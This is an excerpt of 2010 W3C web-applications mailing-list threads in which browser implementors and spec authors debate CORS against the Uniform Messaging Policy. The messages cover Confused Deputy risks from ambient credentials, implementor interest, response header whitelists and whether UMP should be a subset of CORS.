 example? The little chat widget in the corner of the facebook page
 looks like a same origin application.

 Facebook uses a lot of different domains for different purposes.  I
 don't have a complete count, but at least a dozen.  The chat feature
 itself uses a bunch, possibly to get around various connection limits
 in browsers.

This doesn't seem like a good example then, since the attacker would
have to be facebook itself. For robustness, I personally consider
these scenarios when designing an application, but people on this list
might not find it compelling. They might also argue that no attempt
was made to protect against such a vulnerability.

 Keep in mind that the browser's notion of an origin is often much
 smaller than a single application, which is part of the reason web
 developers are so keen on CORS.  Many of them plan to use it only to
 talk to trusted hosts without having to use goofy things like JSONP.

Enabling this scenario is a fine thing, but it's not the scenario we
should be using to test the security

Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 5:36 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 5:15 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 5:07 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Both Adam and Dirk understood correctly. Ideally, I'd like an actual
 CORS example to work on, since I'd have to make analogies with
 postMessage(), and I've already made a ton of analogies, apparently to
 little effect. If people don't fully appreciate the relationship
 between form based CSRF and CORS based Confused Deputy, then we need
 an actual CORS application.

 Out of curiosity, who are the 3 parties involved in the facebook chat
 example? The little chat widget in the corner of the facebook page
 looks like a same origin application.

 Facebook uses a lot of different domains for different purposes.  I
 don't have a complete count, but at least a dozen.  The chat feature
 itself uses a bunch, possibly to get around various connection limits
 in browsers.

 This doesn't seem like a good example then, since the attacker would
 have to be facebook itself. For robustness, I personally consider
 these scenarios when designing an application, but people on this list
 might not find it compelling. They might also argue that no attempt
 was made to protect against such a vulnerability.

 Keep in mind that the browser's notion of an origin is often much
 smaller than a single application, which is part of the reason web
 developers are so keen on CORS.  Many of them plan to use it only to
 talk to trusted hosts without having to use goofy things like JSONP.

 Enabling this scenario is a fine thing, but it's not the scenario we
 should be using to test the security properties of CORS. UMP also
 enables communication between fully trusted participants.

 It seems like a fine scenario to me. We know people want to use CORS
 for this purpose because it makes their code easier and cleaner (both
 of which are nice security things in and of themselves). If both CORS
 and UMP are secure for this use case, then an interesting question is,
 which is easier to use? This is particularly relevant insofar as if
 the existing JSONP-based solution uses cookies, since CORS would
 support this but UMP wouldn't (meaning the degree of rework in the app
 necessary to support the code would be higher).

 Note that I am not saying that this should be the only scenario to be
 reviewed, but you shouldn't just pick and choose the cases that best
 fit your hypothesis.

Over the course of this discussion, I've taken every use-case, with
every arbitrary constraint that anyone wants to add and shown a
corresponding UMP solution, so it is grossly unfair to accuse me of
picking and choosing cases.

For this particular discussion, we were explicitly looking for an
example of a Confused Deputy vulnerability in an actual CORS
application. Such a thing doesn't exist in a scenario with only 2
parties and no attacker. When testing security properties, you need an
attacker.

All that said, if you want to compare the usability of CORS and UMP in
a 2 party interaction between fully trusted participants, we can do
that. Go ahead and sketch out the challenge problem and corresponding
CORS solution.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 6:33 PM, Ian Hickson i...@hixie.ch wrote:
 On Wed, 12 May 2010, Tyler Close wrote:
 
  It is also not a question of opinion, but fact. CORS uses ambient
  authority for access control in 3 party scenarios. CORS is therefore
  vulnerable to Confused Deputy.
 
  That's like saying that HTML uses markup and is therefore vulnerable
  to markup injection. It's a vast oversimplification and overstatement
  of the problem.

 Is it really? XSS is a major problem. HTML provides no facility for
 dealing with XSS and practically invites it. It's hard to deal with this
 situation now since HTML is so widely deployed. CORS invites Confused
 Deputy problems but is not yet widely deployed. We can still do
 something about it.

 HTML's use of markup is not a vulnerability.
 CORS's use of ambient authority is not a vulnerability.

 Sure, both can be used in vulnerable ways, but they are not themselves
 vulnerabilities.

So HTML is not vulnerable to Cross-Site Scripting, C++ is not
vulnerable to buffer overflows and so CORS is not vulnerable to
Confused Deputy.

There's something very Alice in Wonderland about all this Humpty
Dumpty talk and accusations of nonsense.

If there are special precautions that must be taken to avoid a
problem, then you are vulnerable to that problem. From a security
perspective we are interested in what precautions a technology
requires developers to take and whether or not it's feasible to apply
those precautions. Direct memory management forces C++ developers to
consider what kind of library, technique or verifier they'll use to
protect themselves against memory access errors. Automatic sending of
credentials forces CORS developers to consider how they'll protect
themselves against Confused Deputy problems. The requirement for a
defense is inherent in the design of the tool.

Using UMP you can build an app without use of credentials and so
without needing to consider Confused Deputy vulnerabilities.

  It is quite possible to write perfectly safe n-party apps.

 It is also quite possible to stand on your head while riding a bicycle.
 What's your point?

 My point is that you are arguing that one design is less good than
 another, but you are using words that make it sound like you are arguing
 that one design is actually intrinsicly vulnerable.

As explained above, CORS with credentials is intrinsically vulnerable
to Confused Deputy. The use of credentials forces the developer to
consider Confused Deputy vulnerabilities.

 It's just as possible
 to make bad designs using UMP than with CORS.

It's rare that a tool makes bad design impossible. Are you saying
that's the metric for comparing the security of two tools? So long as
bad design is possible, the two tools are equivalent?

 (I would argue that UMP
 actually makes it more likely that designs will have poor security
 characteristics since it ends up being easier to ask for the user's
 credentials directly than doing the right thing. With CORS, on the other
 hand, it's easier to use the user's existing session, so it's less likely
 that people will ask for credentials inappropriately.)

But you haven't considered the dangers that come from reusing the
user's existing session. That's an inherently dangerous thing to do,
but you seem to ignore the problem and so come to the conclusion you
want.

 No one has laid out a clear strategy for developers to follow to use
 CORS safely and shown how to apply it to expected use cases.

 What use cases would you like examples for? Let's write them up and give
 them to Anne to the introduction section.

I want to see CORS try to develop something like the Security
Considerations section in UMP with simple, clear choices for
application developers to consider. I want this advice to be feasible
to follow and to provide a robust defense against Confuse Deputy
problems. I doubt such advice can be provided for CORS.

 The CORS spec doesn't even mention Confused Deputy problems.

 I'm sure Anne would be happy to include suitable text if you provide it.
 However, such text has to be accurate, and not make false claims like
 saying that there is a security vulnerability where there is only the
 potential for one when the feature is misused.

CORS doesn't even say yet how to use it safely, so what does it mean
to misuse it?

We may also have a different perspective on what it means to be candid
about the problems facing developers.

   It is certainly possible to mis-use CORS in insecure ways, but then
   it's also possible to mis-use UMP in insecure ways.

 You could justify any kind of security weakness with that kind of logic.
 Nuclear waste can be used in insecure ways, but then so can hammers.

 No. There is a _massive_ difference between features that _may_ be
 misused, and features that _cannot be used safely_. For example, if XHR
 let you read data from any site without any sort of server opt-in, that
 would be a real security vulnerability, and could not be defended by
 saying

Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
Firefox, Chrome and Caja have now all declared an interest in
implementing UMP. Opera and Safari have both declared an interest in
implementing the functionality defined in UMP under the name CORS. I
think it's clear that UMP has sufficient implementor interest to
proceed along the standardization path.

In the discussion on chromium-dev, Adam Barth wrote:


Putting these together, it looks like we want a separate UMP
specification for web developers and a combined CORS+UMP specification
for user agent implementors.  Consequently, I think it makes sense for
the working group to publish UMP separately from CORS but have all the
user agent conformance requirements in the combined CORS+UMP document.


See:

http://groups.google.com/a/chromium.org/group/chromium-dev/msg/4793e08f8ec98914?hl=en_US

I think this is a satisfactory compromise and conclusion to the
current debate. Anne, are you willing to adopt this strategy? If so, I
think there needs to be a normative statement in the CORS spec that
identifies the algorithms and corresponding inputs that implement UMP.

Before sending UMP to Last Call, we need a CORS and UMP agreement on
response header filtering. We need to reconcile the following two
sections:

http://dev.w3.org/2006/waf/access-control/#handling-a-response-to-a-cross-origin-re

and

http://dev.w3.org/2006/waf/UMP/#response-header-filtering

Remaining subset issues around caching and credentials can be
addressed with editorial changes to CORS. I'll provide more detail in
a later email, assuming we've reached a compromise.

--Tyler

On Mon, Apr 19, 2010 at 12:43 AM, Anne van Kesteren ann...@opera.com wrote:
 Hopefully it helps calling out attention to this in a separate thread.

 In http://lists.w3.org/Archives/Public/public-webapps/2010AprJun/0043.html
 Maciej states Apple has no interest in implementing UMP from the UMP
 specification. (I believe this means that a CORS defined subset that roughly
 matches UMP is fine.) They want to retain their CORS support.

 For Opera I can say we are planning on supporting on CORS in due course and
 have no plans on implementing UMP from the UMP specification.

 It would be nice if the three other major implementors (i.e. Google,
 Mozilla, and Microsoft) also stated their interest for both specifications,
 especially including whether removing their current level of CORS support is
 considered an option.


 --
 Anne van Kesteren
 http://annevankesteren.nl/





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 10:54 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 11 May 2010 19:48:57 +0200, Tyler Close tyler.cl...@gmail.com
 wrote:

 Firefox, Chrome and Caja have now all declared an interest in
 implementing UMP. Opera and Safari have both declared an interest in
 implementing the functionality defined in UMP under the name CORS. I
 think it's clear that UMP has sufficient implementor interest to
 proceed along the standardization path.

 In the discussion on chromium-dev, Adam Barth wrote:

 
 Putting these together, it looks like we want a separate UMP
 specification for web developers and a combined CORS+UMP specification
 for user agent implementors.  Consequently, I think it makes sense for
 the working group to publish UMP separately from CORS but have all the
 user agent conformance requirements in the combined CORS+UMP document.
 

 See:


 http://groups.google.com/a/chromium.org/group/chromium-dev/msg/4793e08f8ec98914?hl=en_US

 I think this is a satisfactory compromise and conclusion to the
 current debate. Anne, are you willing to adopt this strategy? If so, I
 think there needs to be a normative statement in the CORS spec that
 identifies the algorithms and corresponding inputs that implement UMP.

 I don't understand. As far as I can tell Adam suggests making UMP an
 authoring guide.

I read Adam as saying the UMP specification should be published. The
words authoring guide don't appear. I believe his reference to a
benefit for web developers refers to an opinion expressed earlier in
the thread that the UMP specification is more easily understood by web
developers.

 Why would CORS need to normatively depend on it?

For developers to be able to rely on the normative statements made in
UMP when using a CORS implementation,  CORS must normatively claim to
be implementing UMP.

 Before sending UMP to Last Call, we need a CORS and UMP agreement on
 response header filtering. We need to reconcile the following two
 sections:


 http://dev.w3.org/2006/waf/access-control/#handling-a-response-to-a-cross-origin-re

 and

 http://dev.w3.org/2006/waf/UMP/#response-header-filtering

 Remaining subset issues around caching and credentials can be
 addressed with editorial changes to CORS. I'll provide more detail in
 a later email, assuming we've reached a compromise.

 I think we first need to figure out whether we want to rename headers or
 not, before any draft goes to Last Call, especially if UMP wants to remain a
 subset of some sorts.

AFAICT, your renaming proposal does not cover this section of CORS. I
think the two efforts can proceed in parallel. I look forward to your
feedback on this topic.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 11:41 AM, Ojan Vafai o...@chromium.org wrote:
 What is the difference between an authoring guide and a specification for
 web developers?

The difference is whether or not the normative statements in UMP
actually are normative for a CORS implementation. This comes down to
whether or not a developer reading UMP can trust what it says, or must
he also read the CORS spec.

 The key point of making this distinction is that
 implementors should be able to look solely at the combined spec.

No, the key point is to relieve developers of the burden of reading
and understanding CORS. The CORS spec takes on the burden of restating
UMP in its own algorithmic way so that an implementor can read only
CORS.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-11 Thread Tyler Close
On Tue, May 11, 2010 at 12:36 PM, Arthur Barstow art.bars...@nokia.com wrote:
 Jonas, Anne, Tlyer, All,

 On May 11, 2010, at 3:08 PM, ext Jonas Sicking wrote:

 Personally I would prefer to see the UMP model be specced as part of
 the CORS spec, mostly to avoid inevitable differences between two
 specs trying to specify the same thing. And creating an authoring
 guide specifically for the UMP security model to help authors that
 want to just use UMP.

 Yes, I would also prefer that. Are there any technical reason(s) this can't
 be done?

CORS introduces subtle but severe Confused Deputy vulnerabilities
which should prevent it from being standardized. Some believe/hope
these vulnerabilities can be mitigated, but the suggested techniques
are not well explained yet, will be overly constraining and will not
work in many common cases. So far, the CORS document does not even
explain these problems, let alone offer convincing solutions.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-21 Thread Tyler Close
On Wed, Apr 21, 2010 at 8:57 AM, Anne van Kesteren ann...@opera.com wrote:
 Uniform doesn't tell you much about what it is doing.

The term uniform in Uniform Messaging Policy (UMP) is used in the
same sense as it is used in Uniform Resource Identifier (URI). In
particular, the following from RFC 3986 is most relevant:

URIs have a global scope and are interpreted consistently regardless
of context, ...

The UMP defines a way to produce an HTTP request regardless of
context. Today, browsers can only produce requests that are entangled
with the user-agent's local context and this is the key to enabling
CSRF-like vulnerabilities. Well formed, legitimate Web content that
expresses an HTTP request might be harmless when viewed from an
attacker's user-agent, but if the exact same content is viewed through
a victim's user-agent, there is a successful attack. The difference
between the two requests is simply the change of context. The
well-known CSRF attack is not the only way to cause mischief by
switching the local context of an HTTP request. There is a whole
family of similar attacks that use the same pattern, called Confused
Deputy. The UMP enables web content to avoid this whole family of
attacks by making requests from the global scope, rather than from the
user-agent's local context.

Today, requesting content is interpreted differently depending on
context. The UMP makes this interpretation uniform, and so the
produced HTTP request is the same no matter where it is produced from.
This uniformity allows web content to avoid the built-in Confused
Deputy vulnerabilities in the user-agent. Uniformity is the crux of
what the UMP does.

As MarkM noted, uniformity is not the same as anonymity. I can compose
web content that produces a request that declares my identity. Using
the UMP, I can ensure that the produced request is the same, no matter
where the request is issued from. The produced request still declares
my identity and so is not anonymous.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in CORS
 that make it more or less the same as UMP.

Why can't it be made exactly like UMP? All of the requirements in UMP
have been discussed at length and in great detail on this list by some
highly qualified people. The current UMP spec reflects all of that
discussion. By your own admission, the CORS spec has not received the
same level of review for these features. Why hasn't CORS adopted the
UMP solution?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Tue, Apr 20, 2010 at 11:39 AM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 20, 2010, at 9:27 AM, Tyler Close wrote:

 On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com
 wrote:

 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc
 wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in
 CORS
 that make it more or less the same as UMP.

 Why can't it be made exactly like UMP? All of the requirements in UMP
 have been discussed at length and in great detail on this list by some
 highly qualified people. The current UMP spec reflects all of that
 discussion. By your own admission, the CORS spec has not received the
 same level of review for these features. Why hasn't CORS adopted the
 UMP solution?

 It should be made exactly like UMP, either by changing CORS, or changing
 UMP, or some combination of the two. A list of differences between UMP and
 CORS anonymous mode would be most helpful.

Some of these issues are listed at the top of:

http://lists.w3.org/Archives/Public/public-webapps/2010AprJun/0060.html

Many of the differences arise from CORS being silent about relevant
issues, such as caching or received cookies, so it's hard to know what
the CORS stand on these issues is. This part of the CORS spec is just
not well developed yet.

Since there are still major outstanding issues against other parts of
the CORS spec, I still think it's a better idea to move forward with
separate documents, where the CORS spec references the UMP spec for
its credential-free mode.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-04-20 Thread Tyler Close
On Tue, Apr 20, 2010 at 11:36 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Apr 20, 2010 at 9:27 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Mon, Apr 19, 2010 at 6:47 PM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 20 Apr 2010 00:38:54 +0900, Jonas Sicking jo...@sicking.cc wrote:

 As I've said before. I'd be interested in implementing UMP in firefox
 if we can come  up with a reasonable API for using it. I.e. a separate
 constructor or flag or similar on XHR. This is assuming that UMP is a
 reasonable subset of CORS.

 Have you looked at the proposal I put in XHR2? It sets certain flags in CORS
 that make it more or less the same as UMP.

 Why can't it be made exactly like UMP? All of the requirements in UMP
 have been discussed at length and in great detail on this list by some
 highly qualified people. The current UMP spec reflects all of that
 discussion. By your own admission, the CORS spec has not received the
 same level of review for these features. Why hasn't CORS adopted the
 UMP solution?

 Would you be fine with folding UMP into CORS if more of the wording
 from UMP is used in the CORS spec?

 Are the differences only editorial or are there different header
 names/values as well?

The differences are not only editorial. The problem is missing MUST
statements in the CORS spec, governing what the user-agent does. The
on-the-wire parts are nearly identical. The header names and values
are consistent (or will be once CORS response header filtering is
fixed).

Ideally, I'd like UMP to be folded into CORS by reference rather than
by value, since there are major outstanding issues against CORS that
don't affect UMP.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-19 Thread Tyler Close
On Mon, Apr 19, 2010 at 10:55 AM, Julian Reschke julian.resc...@gmx.de wrote:
 On 19.04.2010 19:37, Tyler Close wrote:

 The default members of the above whitelist include response entity
 headers defined by [HTTP], plus the Location and Warning headers. The

 Why are you ignoring other headers in the permanent registry? Why only
 allow
 entity headers? What the problem, for instance, with Allow (RFC 2616),
 Allow-Patch (RFC 5749) or Dav (RFC 4918)?

 The default members of the whitelist define the minimum set of headers
 to allow. If the response entity is delivered, then at a minimum, the
 response entity headers should accompany it, assuming it is safe to do
 so. I manually vetted those headers. To support redirection, we need
 Location. Warning is needed in case the requesting content wants to
 reject stale responses. The server must then explicitly opt into
 anything beyond the minimum header set.

 Again: did you check all the headers in the permanent registry? If you did,
 why are the ones (which are just examples) missing? And what's the reason to
 default to strip general headers and response headers?

Again, the model is to define a minimal whitelist and enable servers
to explicitly extend the minimal whitelist. The default members of the
whitelist only exist as a convenience, so that servers don't have to
explicitly list them on every response.

Also, asking a static specification to keep up with a mutable registry
is not feasible.

 default part of the whitelist does not include: headers used for
 credential authentication, such as WWW-Authenticate; nor headers that
 might reveal private network configuration information, such as Via;

 What's the rational for stripping all of the information in Via?

 Are you suggesting UMP specify an algorithm for filtering out only
 some Via header values?

 I'm concerned that by simply dropping the header, you profile too much.

It is not simply dropped, it can be enabled by any server or proxy in
the request path.

 nor caching headers, such as Age, which provide explicit information
 about requests made on behalf of other requesting content.
 

 What's the problem with Age, please clarify?

 Content from one origin can tell exactly how long ago content from
 another origin requested the cached content. That's at least a privacy
 issue, and possibly a confidentiality issue.

 That appears to be an issue completely independently of CORS/UMP.

It is not at all independent. There was no way to access the Age
header cross-origin before CORS/UMP. If Age is allowed by default then
any page can ask What did you know and when did you know it?, which
is, of course, a powerful question.

 If that's
 the case, it should be mentioned in the HTTPbis security considerations,

Last I heard, HTTPbis punted on explaining anything to do with the
Same Origin Policy security model that has evolved around HTTP. I
asked them to and they refused.

 but doesn't necessarily require blocking.

Again, it's not blocked. It just requires an explicit opt-in.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-19 Thread Tyler Close
On Mon, Apr 19, 2010 at 11:39 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Mon, Apr 19, 2010 at 11:30 AM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 19, 2010, at 10:06 AM, Tyler Close wrote:

     Uniform-Headers = Uniform-Headers : ( * | #field-name )

 [...]

 Are Apple and/or Firefox interested in implementing the above? Does
 mnot or other HTTP WG members consider the above a satisfactory
 solution to ISSUE-90?

 I'm interested in implementing a feature along these lines if it goes into
 CORS. If it's UMP-only, then no, and I would object that it violates the
 subset relation.

 I am also not sure the * value is a good idea. It is tempting in its
 convenience but seems likely to cause unintended consequences.

 I agree with everything Maciej said.

 This time.

Thanks for the quick response time.

If this is a good feature, shouldn't the pressure be on CORS to adopt
it, rather than for UMP to drop it? Otherwise, it might seem politics
are overriding technical virtue.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-14 Thread Tyler Close
I have been studying CORS ISSUE-90
http://www.w3.org/2008/webapps/track/issues/90, so as to bring UMP
into line with this part of CORS. I can't find any pattern or
rationale to the selection of headers on the whitelist versus those
not on the whitelist. Does anyone know where this list came from and
how it was produced?

If I produce a more comprehensive whitelist for UMP will CORS follow my lead?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Last Call status/plans? [Was: Re: [UMP] Request for Last Call]

2010-04-14 Thread Tyler Close
On Wed, Apr 14, 2010 at 9:41 AM, Tyler Close tyler.cl...@gmail.com wrote:
 I have been studying CORS ISSUE-90
 http://www.w3.org/2008/webapps/track/issues/90, so as to bring UMP
 into line with this part of CORS. I can't find any pattern or
 rationale to the selection of headers on the whitelist versus those
 not on the whitelist. Does anyone know where this list came from and
 how it was produced?

 If I produce a more comprehensive whitelist for UMP will CORS follow my lead?

The following whitelist includes all end-to-end response headers
defined by HTTP, unless there is a specific security risk:

# Age
# Allow
# Cache-Control
# Content-Disposition
# Content-Encoding
# Content-Language
# Content-Length
# Content-Location
# Content-MD5
# Content-Range
# Content-Type
# Date
# ETag
# Expires
# Last-Modified
# Location
# MIME-Version
# Pragma
# Retry-After
# Server
# Vary
# Warning

Does anyone object to making this the new whitelist for both CORS and UMP?

--Tyler



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-12 Thread Tyler Close
On Mon, Apr 12, 2010 at 6:49 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Maciej, Tyler - thanks for continuing this discussion. I think it would be
 helpful to have consensus on what we mean by subsetting in this context.
 (Perhaps the agreed definition could be added to the CORS and UMP Comparison
 [1].)

I've added a new section to the wiki page, UMP as subset of CORS:

http://www.w3.org/Security/wiki/Comparison_of_CORS_and_UMP#UMP_as_subset_of_CORS

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-12 Thread Tyler Close
On Mon, Apr 12, 2010 at 1:00 PM, Maciej Stachowiak m...@apple.com wrote:

 On Apr 12, 2010, at 10:33 AM, Tyler Close wrote:

 On Mon, Apr 12, 2010 at 6:49 AM, Arthur Barstow art.bars...@nokia.com
 wrote:

 Maciej, Tyler - thanks for continuing this discussion. I think it would
 be
 helpful to have consensus on what we mean by subsetting in this context.
 (Perhaps the agreed definition could be added to the CORS and UMP
 Comparison
 [1].)

 I've added a new section to the wiki page, UMP as subset of CORS:


 http://www.w3.org/Security/wiki/Comparison_of_CORS_and_UMP#UMP_as_subset_of_CORS


 I do not think the set of subset criteria posted there matches what I
 proposed and what we've been discussing in this thread.

I intended criteria #3 to correspond to conditions A1+B2 in our last
email exchange, which covers an UMP API to CORS resource message
exchange. The last unnumbered criteria corresponds to conditions A2+B1
in our last email exchange, which covers a CORS API to UMP resource
message exchange. Criteria #1 and #2 correspond to the additional
safety aspects of condition C that you wanted explicitly stated.

What aspect of the subset criteria have I missed?

 Should I put some
 abbreviated form of my proposal in the wiki? I am not sure what the
 conventions are for editing this wiki page.

 I think the points you make on the wiki about cross-endangerment are good,
 but they are not really subset criteria, that's a property we want for any
 two Web platform features, and it could be achieved with a strategy of
 making things completely different instead of the subset strategy. They do
 represent relations that we should maintain however.

I included these because our last email exchange indicated to me that
you wanted them explicitly stated.

 I think even taken together, your set of subset conditions does guarantee
 that a CORS client implementation is automatically also a UMP client
 implementation. If we went that way, then we would have to consider whether
 there will ever be client implementors of UMP itself, or it will be
 impossible to fulfill CR exit criteria.

If there are implementers of CORS, then by definition, there are
implementers of UMP. I don't see anything in CR exit criteria that
requires implementers to swear not to also implement other
specifications.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Request for Last Call

2010-04-08 Thread Tyler Close
On Thu, Apr 8, 2010 at 5:44 AM, Marcos Caceres marc...@opera.com wrote:
 To me personally, it only really makes sense for UMP to be merged into CORS.
 Having both specs is confusing.

Given that we've created a superset-subset relationship between CORS
and UMP, we don't have divergent specs for the same functionality;
instead we simply have a modular spec. Splitting the spec this way is
useful because the UMP subset is significantly smaller and the CORS
superset involves additional, complicated security risks.

 To have UMP as an optional add-on does not
 feel right because of the DBAD issue.

Indeed, DBAD is only relevant to CORS, so adding this complexity to
UMP by putting it in the same document with the rest of CORS is
confusing.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Subsetting (was: [XHR2] AnonXMLHttpRequest())

2010-04-08 Thread Tyler Close
On Wed, Feb 3, 2010 at 7:40 PM, Maciej Stachowiak m...@apple.com wrote:
 Actually, the other proposal is to provide an XHR-like API that would use 
 CORS forcing a unique origin as an input parameter - there is no need to
 My hope is that this would be semantically equivalent to using UMP.

This unique origin would still need to discard Set-Cookie response
headers to prevent the accumulation of credentials associated with the
unique origin. It would also need to prohibit the reuse of a TLS
client authenticated connection or NTLM authenticated connection. It
would also need to prevent use of cache entries populated by
non-uniform requests. The CORS draft is also unclear on what happens
with the Referer header.

 What I'm looking for is a clear and objective way to evaluate the desired 
 subset properties. Here are some clear-cut subset properties that I think 
 will give most of the interoperability and ease of implementation you want:

 (A) Every Uniform Request should also be a valid CORS request.
.
...with the same semantics. The goals being:
1) an UMP API can safely and successfully send a uniform request to a
CORS resource
2) a CORS API can safely send a request to an UMP resource, which may
choose to either fail or allow the request

 (B) Every Uniform Response should also be a valid CORS response.

...with the same semantics. The goal being:
1) an UMP resource can safely and successfully return a uniform
response to a CORS API
2) a CORS resource can safely and successfully return a uniform
response to an UMP API

Given the above, a developer can read only UMP and ignore CORS and
still write safe code that works. That's what I mean by subset.

 (C) When a CORS client makes a Uniform Request and receives either a Uniform 
 Response, or an HTTP response that is neither a Uniform Response nor a 
 response would allow access under CORS rules, then the processing 
 requirements under CORS are the same as the processing requirements under UMP.

(C) seems the same as (B) if we assume both CORS and UMP properly
reject Same-Origin-only responses.

 Currently (A) and (C) do not hold. One counter-example to (A): a request that 
 contains no Origin header at all, not even Origin: null, may be a Uniform 
 Request but is not a valid CORS request.

I think it would be safe for a CORS resource to assume Origin: null
when no Origin is provided. I agree the current spec doesn't say so.

 One counter-example to (C): UMP will follow a redirect that is neither a 
 Uniform Response nor allows access under CORS; but CORS will not.

This has since been reconciled.

 I am not currently aware of any violations of (B).

(B)(2) is currently violated by the difference in response header
filtering. This can be reconciled when the current open CORS issue
about response headers is closed. It'll be interesting to see how this
issue is resolved since it is potentially very contentious. Banning
response headers seriously affects the extensibility of HTTP.

 Also, the reason the conditions on (C) are a little funny: I think it's 
 possible that a CORS implementation could make a Uniform Request that 
 receives a non-Uniform Response that nontheless allows access, but I'm 
 actually not sure if this is possible. It's definitely possible if it is 
 legal to send multiple Access-Control-Allow-Origin: headers in a response, 
 or to send Access-Control-Allow-Origin: null. I am not sure if either of 
 these is allowed. I'm also not sure if there are other possible CORS 
 responses that would violate the Uniform Request requirements or UMP 
 processing model. If there are no such conflicts, then we could tighten C to:

An UMP resource is only allowed to respond with a single
Access-Control-Allow-Origin: *. Other values are undefined by UMP and
so don't offer any defined behavior that an UMP resource can rely
upon. That's not a violation of (C) through, since (C) says the
response is either a uniform response or one rejected by both UMP and
CORS.

 (C') When a CORS client makes a Uniform Request and receives any response, 
 then the processing requirements under CORS are the same as the processing 
 requirements under UMP.

CORS defines more kinds of successful responses than does UMP, since
it supports additional values for the Access-Control-Allow-Origin
header. So (C') would be violated if a non-compliant UMP resource
responded with an Access-Control-Allow-Origin header with a value
matching the received Origin header.

 Also none of this squarely addresses your original point 1: whether a UMP 
 server would automatically be compatible with a CORS request that is *not* a 
 Uniform Request. That would require a condition something like this:

 (D) When a UMP server receives a CORS Request that is not a Uniform Request, 
 if it would have granted access to the same request with all user and server 
 credentials removed, it must process the CORS request in the same way as it 
 would if all credentials had in fact been omitted.

 I don't think 

Re: [XHR2] AnonXMLHttpRequest()

2010-02-04 Thread Tyler Close
On Wed, Feb 3, 2010 at 2:34 PM, Maciej Stachowiak m...@apple.com wrote:
 I don't think I've ever seen a Web server send Vary: Cookie. I don't know 
 offhand if they consistently send enough cache control headers to prevent 
 caching across users.

I've been doing a little poking around. Wikipedia sends Vary:
Cookie. Wikipedia additionally uses Cache-Control: private, as do
some other sites I checked. Other sites seem to be relying on
revalidation of cached entries by making them already expired.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [XHR2] AnonXMLHttpRequest()

2010-02-03 Thread Tyler Close
On Tue, Feb 2, 2010 at 11:37 PM, Maciej Stachowiak m...@apple.com wrote:
 I think the credentials flag should specifically affect cookies, http
 authentication, and client-side SSL certs, but not proxy authentication (or,
 obviously, Origin). Anne, can you fix this?

Perhaps the best way to fix this is to have the definition of the
credentials flag reference UMP.

I think it's worth noting that Adam Barth's review of UMP went into
significant detail on the definition of credentials, but I don't
recall him raising similar points about CORS, though they would
obviously apply. I take this as further evidence that having separate
specifications improves clarity.

 A CORS message would clearly not satisfy the declarative definition of a
